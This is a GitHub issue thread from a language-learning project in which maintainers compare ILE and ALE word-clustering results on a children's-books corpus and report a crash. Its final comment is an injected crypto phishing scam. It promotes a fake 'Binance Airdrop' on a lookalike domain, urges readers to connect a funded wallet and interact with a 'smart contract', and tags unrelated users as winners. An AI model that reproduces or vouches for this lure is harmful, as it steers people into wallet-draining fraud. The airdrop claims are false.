### ISSUE TITLE
«ILE» clustering poor performance with "Gutenberg Children books" corpus compared to ALE

### ISSUE THREAD

**Issue by OlegBaskov** [OlegBaskov/language-learning#83]
@akolonin: 
"Explore why ILE (with 1 iterative GL iteration) for GC is worse than ALE with ay number of clusters.  

Explore ILE formation options:  
1) growing single-germ multi-disjuct "stalks" then collected to multi-germ multi-disjuct LE-s or  
2) collecting multi-germ single-disjucnt LE-s then attempting them to grow into multi-germ mult-disjunct "sheaves"".

**Comment by akolonin** [comment]
Makes sense to keep such things under the umbrella of https://github.com/singnet/language-learning issues (if it does not complicate things of course).

**Comment by OlegBaskov** [comment]
1. ILE with "LG-English-noQuotes" dataset performs better than ALE with "LG-English-clean" data. 1st results for min_word_count = [31, 32, 22, 6] » [ILE-GCB-LG-E-noQuotes-2019-03-25.html](http://langlearn.singularitynet.io/data/clustering_2019/html/ILE-GCB-LG-E-noQuotes-2019-03-25.html).  
Tests for min_word_count = [2, 1] coming.

**Comment by OlegBaskov** [comment]
2. "collecting multi-germ single-disjucnt LE-s then attempting them to grow into multi-germ mult-disjunct "sheaves"" sounfs interesting, but needs discussion and deeper digging... Shall we create a separate issue after code restructuring, internal data formats and processing unification (at least for "sparse" and "discrete" word vector spaces)?

**Comment by OlegBaskov** [comment]
[ILE-GCB-LG-E-noQuotes-2019-03-25.html](http://langlearn.singularitynet.io/data/clustering_2019/html/ILE-GCB-LG-E-noQuotes-2019-03-25.html) crashed with `min_word_count = 2` -- error 255, issue #61 :(

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @hems, @lanastasov, @Akagi201, @Nerothos, @xiongharry, @john990, @0xhanh
